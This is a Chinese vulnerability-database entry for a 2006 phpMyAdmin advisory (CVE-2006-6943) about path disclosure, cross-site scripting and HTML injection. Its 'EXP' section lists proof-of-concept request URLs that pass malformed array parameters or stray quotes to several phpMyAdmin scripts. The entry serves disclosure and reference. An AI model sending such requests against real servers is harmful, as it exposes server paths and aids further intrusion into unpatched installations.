phpMyAdmin 多个输入确认漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111040 漏洞类型 输入验证
发布时间 2006-09-15 更新时间 2007-08-07
CVE编号 CVE-2006-6943 CNNVD-ID CNNVD-200701-302
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/29062
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-302
|漏洞详情
PhpMyAdmin2.9.1.1之前版本可以让远程攻击者借助对(a)scripts/check_lang.php和(b)themes/darkblue_orange/layout.inc.php的直接请求,借助提交到(c)index.php的(1)lang[],(2)target[],(3)db[],(4)goto[],(5)table[]和(6)tbl_group[]数组参数,到(d)sql.php的(7)back[]参数,到(e)server_databases.php的(8)sort_by参数和到(f)db_printview.php的(9)db参数,获得全服务器路径。
|漏洞EXP
source: http://www.securityfocus.com/bid/21137/info
    
phpMyAdmin is prone to multiple input-validation vulnerabilities, including an HTML-injection vulnerability, cross-site scripting vulnerabilities, and information-disclosure vulnerabilities.
    
An attacker could exploit these vulnerabilities to view sensitive information or to have arbitrary script code execute in the context of the affected site, which may allow the attacker to steal cookie-based authentication credentials or change the way the site is rendered to the user. Data gained could aid in further attacks.
    
All versions of phpMyAdmin are vulnerable.

http://www.example.com/scripts/check_lang.php 
http://www.example.com/themes/darkblue_orange/layout.inc.php 
http://www.example.com/index.php?lang[]= 
http://www.example.com/index.php?target[]= 
http://www.example.com/index.php?db[]= 
http://www.example.com/index.php?goto[]= 
http://www.example.com/left.php?server[]= 
http://www.example.com/index.php?table[]= 
http://www.example.com/server_databases.php?token=your_token&sort_by=" 
http://www.example.com/index.php?db=information_schema&token=your_token&tbl_group[]= http://www.example.com/db_printview.php?db=" 
http://www.example.com/sql.php?back[]=
|参考资料

来源:www.phpmyadmin.ne
链接:http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2006-8
来源:BID
名称:21137
链接:http://www.securityfocus.com/bid/21137
来源:BUGTRAQ
名称:20061116PhpMyAdminallversion[multiplesvulnerability]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=116370414309444&w=2